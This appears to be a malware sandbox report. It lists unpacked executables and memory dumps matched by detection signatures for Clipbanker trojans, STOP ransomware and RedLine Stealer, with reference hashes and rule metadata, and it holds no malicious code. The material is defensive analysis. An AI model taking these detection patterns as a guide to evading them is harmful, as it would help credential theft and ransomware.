Source: 17.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 29.2.mstsca.exe.9615a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 29.2.mstsca.exe.9615a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 17.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 17.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 23.2.mstsca.exe.8f15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 23.2.mstsca.exe.8f15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 13.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 13.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 22.2.sIQywRNC5M.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 22.2.sIQywRNC5M.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 7.2.sIQywRNC5M.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 7.2.sIQywRNC5M.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 24.2.sIQywRNC5M.exe.5db15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 24.2.sIQywRNC5M.exe.5db15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 21.2.sIQywRNC5M.exe.5df15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 21.2.sIQywRNC5M.exe.5df15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.2.sIQywRNC5M.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.2.sIQywRNC5M.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.2.sIQywRNC5M.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.2.sIQywRNC5M.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 24.2.sIQywRNC5M.exe.5db15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 24.2.sIQywRNC5M.exe.5db15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.2.sIQywRNC5M.exe.5e915a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.2.sIQywRNC5M.exe.5e915a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 4.2.sIQywRNC5M.exe.5d815a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 4.2.sIQywRNC5M.exe.5d815a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 21.2.sIQywRNC5M.exe.5df15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 21.2.sIQywRNC5M.exe.5df15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 22.2.sIQywRNC5M.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 22.2.sIQywRNC5M.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.2.sIQywRNC5M.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.2.sIQywRNC5M.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.2.sIQywRNC5M.exe.5e915a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.2.sIQywRNC5M.exe.5e915a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 25.2.sIQywRNC5M.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 25.2.sIQywRNC5M.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.2.sIQywRNC5M.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.2.sIQywRNC5M.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 25.2.sIQywRNC5M.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 25.2.sIQywRNC5M.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0.2.sIQywRNC5M.exe.5dc15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0.2.sIQywRNC5M.exe.5dc15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 4.2.sIQywRNC5M.exe.5d815a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 4.2.sIQywRNC5M.exe.5d815a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 7.2.sIQywRNC5M.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 7.2.sIQywRNC5M.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0.2.sIQywRNC5M.exe.5dc15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0.2.sIQywRNC5M.exe.5dc15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000017.00000002.2729522071.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000017.00000002.2729522071.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000001A.00000002.2728786500.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001A.00000002.2728786500.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000010.00000002.2309758301.0000000000BBC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001C.00000002.3340917154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001C.00000002.3340917154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000015.00000002.2542639279.0000000004436000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000011.00000002.4492888211.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000011.00000002.4492888211.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000001B.00000002.3341705658.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001B.00000002.3341705658.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000004.00000002.2052330651.0000000005D80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000006.00000002.2072615613.000000000459B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000007.00000002.4493001033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
